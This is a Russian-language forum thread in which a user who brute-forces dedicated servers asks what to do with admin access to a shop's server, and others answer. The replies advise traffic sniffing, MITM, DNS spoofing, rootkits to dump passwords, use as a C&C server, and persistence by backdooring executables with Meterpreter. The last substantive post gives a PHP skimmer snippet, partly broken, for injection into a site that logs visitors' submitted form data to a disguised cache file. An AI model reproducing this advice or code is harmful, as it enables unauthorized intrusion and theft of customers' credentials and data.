By: world on 2016-09-27 17 ч.
Все приветсвую. Занимаюсь брутом дедиков и случилось так что я задался вопрос а что можно получить с этих "дедиков"!?
Есть дед одного шопа, так вот можно ли как-нибудь снеферить весь трафф который отсылается на сервер юзерами данного шопа?
если да, то помимо снифа что еще можно провернуть с дедом? Буду благораен откликнувшимся 
By: blaxblox on 2016-09-27 21 ч.
Есть дед одного шопа
можно ли как-нибудь снеферить весь трафф который отсылается на сервер юзерами данного шопа?
помимо снифа что еще можно провернуть с дедом?
ты_чо_тупой.3gp
By: world on 2016-09-28 07 ч.
world пишет:Есть дед одного шопа
world пишет:можно ли как-нибудь снеферить весь трафф который отсылается на сервер юзерами данного шопа?
world пишет:помимо снифа что еще можно провернуть с дедом?
ты_чо_тупой.3gp
Спрашиваю потому как ни знаю, а то твоё высокомерие ослепляет
By: Roug on 2016-10-11 16 ч.
Если дедик в топовом железе то посмотри с какой скоростью он к примеру перебирает пароли к wpa2..? Прикинь если 150 000 - 200 000 пас/сек.. можщё щёлкать вайфаи как орешки) P/S/ если конечно руки ростут мимо жопы..
Продам обаму, пока живого. Предоплата 100% перед поставкой товара..
By: pp on 2016-10-11 18 ч.
Делать можно много всего. Все завсит от твоих потребностей. Но вероятно придется админ и поменяет пароль, на этом все закончится. Можно с этого дедика брутить другие дедики, сканировать порты (работает 24/7, хорошее железо, хороее инет соеденение). С чего ты вообще взял, что дед какого-то шопа? Проверь, может там базы данных какие-то хранятся, может че еще.
Если дедик в топовом железе то посмотри с какой скоростью он к примеру перебирает пароли к wpa2..?
Высокая нагрузка приведет к тому, что админ охуеет и будет проверять и тебя быстро отрубят. Можно вообще майнить битки, но толку, если это будет не долго продолжаться?
Jabber: [email protected]
PGP Ключ здесь
By: world on 2016-10-14 23 ч.
Делать можно много всего. Все завсит от твоих потребностей. Но вероятно придется админ и поменяет пароль, на этом все закончится. Можно с этого дедика брутить другие дедики, сканировать порты (работает 24/7, хорошее железо, хороее инет соеденение). С чего ты вообще взял, что дед какого-то шопа? Проверь, может там базы данных какие-то хранятся, может че еще.
Roug пишет:Если дедик в топовом железе то посмотри с какой скоростью он к примеру перебирает пароли к wpa2..?
Высокая нагрузка приведет к тому, что админ охуеет и будет проверять и тебя быстро отрубят. Можно вообще майнить битки, но толку, если это будет не долго продолжаться?
Дедики бручу, там и гидра брутит) всё брутить, суть такова что там рабочая группа SHOP***, базы данных тоже есть так как стоит MySQL server, но вытянуть базы не могу так как они в процессе,следовательно, отказ в доступе а именно в копирование, удалении, переименовании.
By: plastmaster on 2016-10-16 00 ч.
Вопрос сам по себе некорректный, примерно как "а как взломать интернет?". Можно делать невероятно много вещей
Делать можно много всего. Все завсит от твоих потребностей. Но вероятно придется админ и поменяет пароль, на этом все закончится. Можно с этого дедика брутить другие дедики, сканировать порты (работает 24/7, хорошее железо, хороее инет соеденение). С чего ты вообще взял, что дед какого-то шопа? Проверь, может там базы данных какие-то хранятся, может че еще.
Я полностью согласен с этим мнением и хочу дополнить, что кроме твоих потребностей, нужно уточнить возможности дедика.
Операционная система?
Топология сети?
Ширина каналов связи?
Конфигурация железа?
Какие права есть на дедике?
В зависимости от этого можно делать атаки "мэн ин мидл", dns спуффинг, брутфорс (ну это вы и сами знаете). Можно поставить руткит и дампить все пароли всех пользователей (в том числе и пользоватей БД).
Короче... еще раз повторюсь - вопрос нужно конкретизировать.
By: world on 2016-10-17 19 ч.
Вопрос сам по себе некорректный, примерно как "а как взломать интернет?". Можно делать невероятно много вещей
pp пишет:Делать можно много всего. Все завсит от твоих потребностей. Но вероятно придется админ и поменяет пароль, на этом все закончится. Можно с этого дедика брутить другие дедики, сканировать порты (работает 24/7, хорошее железо, хороее инет соеденение). С чего ты вообще взял, что дед какого-то шопа? Проверь, может там базы данных какие-то хранятся, может че еще.
Я полностью согласен с этим мнением и хочу дополнить, что кроме твоих потребностей, нужно уточнить возможности дедика.
Операционная система?
Топология сети?
Ширина каналов связи?
Конфигурация железа?
Какие права есть на дедике?
В зависимости от этого можно делать атаки "мэн ин мидл", dns спуффинг, брутфорс (ну это вы и сами знаете). Можно поставить руткит и дампить все пароли всех пользователей (в том числе и пользоватей БД).
Короче... еще раз повторюсь - вопрос нужно конкретизировать.
Win server 2012
400mb
8gb оперативы
права Admin
By: plastmaster on 2016-10-19 03 ч.
Так что же ты хочешь?
By: P1V0T on 2016-11-01 08 ч.
Деда можно юзать как C&C сервер.. Да много чего.
После лома нужно укрепиться в системе. Оставить бэкдор проще говоря. Если админ сменит пасс, то бэкдору будет пофиг.
Тут правда есть свои ньюансы. Если добавлять бэкдор в ауто бут в ръестре, то админ с опытом реверснит вычистит бэкдор msconfig'ом. Крч говоря, пропатчить часто запускаемую программу(сервер апача, скуль базу и т.д.)
// Вершины постигаются с азов.
By: Бродяга on 2016-11-01 08 ч.
Деда можно юзать как C&C сервер.. Да много чего.
После лома нужно укрепиться в системе. Оставить бэкдор проще говоря. Если админ сменит пасс, то бэкдору будет пофиг.
Тут правда есть свои ньюансы. Если добавлять бэкдор в ауто бут в ръестре, то админ с опытом реверснит вычистит бэкдор msconfig'ом. Крч говоря, пропатчить часто запускаемую программу(сервер апача, скуль базу и т.д.)
Звучит красиво. А как дела с примерами? Чем патчить?
By: P1V0T on 2016-11-01 10 ч.
P1V0T пишет:Деда можно юзать как C&C сервер.. Да много чего.
После лома нужно укрепиться в системе. Оставить бэкдор проще говоря. Если админ сменит пасс, то бэкдору будет пофиг.
Тут правда есть свои ньюансы. Если добавлять бэкдор в ауто бут в ръестре, то админ с опытом реверснит вычистит бэкдор msconfig'ом. Крч говоря, пропатчить часто запускаемую программу(сервер апача, скуль базу и т.д.)Звучит красиво. А как дела с примерами? Чем патчить?
Для этой задачи есть множество софта. Метерпретер тот же.
В вике метера статья вроде называлась Backdooring exe files.
Нужно просто поискать
// Вершины постигаются с азов.
By: blaxblox on 2016-11-01 12 ч.
вычистит бэкдор msconfig'ом
Мсконфиг далеко не все возможности автозагрузки показывает.
Backdooring exe files
Если есть что бэкдорить. Системные файлы не подойдут, т.к. sfc, а сторонних может и не быть.
By: P1V0T on 2016-11-01 12 ч.
P1V0T пишет:вычистит бэкдор msconfig'ом
Мсконфиг далеко не все возможности автозагрузки показывает.
P1V0T пишет:Backdooring exe files
Если есть что бэкдорить. Системные файлы не подойдут, т.к. sfc, а сторонних может и не быть.
Ну а зачем сервер тогда?)
Есть дед одного шопа, так вот можно ли как-нибудь снеферить весь трафф который отсылается на сервер юзерами данного шопа?:)
Да, вполне возможно. Есть два варианта развития
1) Снифать на прямую весь трафик. Под вин есть утилита WinDump для полного снифа трафика, а под никсы есть t*****dump. Не работает с SSL, но снифается абсолютно любой траф.
2) Написать сниффер на пыхе и внедрить в какой-нибудь сценарий который отвечает за весь двиг.
Вот снифера:
<?php
$log += "\n===== ".$_SERVER["REMOTE_ADDR"]." == <b> ".$_SERVER["HTTP_USER_AGENT']."</b>======\n";
$log += "<b>VARDUMP: </b><span style=\"color:#333\" ".($_SERVER["REQUEST_METHOD"] == "POST" ? var_dump($_POST) : var_dump($_GET)."</span>";
file_put_contents(__DIR__."/wp-content/uploads/tmp.cache", $log);
?>// Вершины постигаются с азов.
By: mr_anderson on 2016-12-18 16 ч.
Из них можно получить то, что на них есть!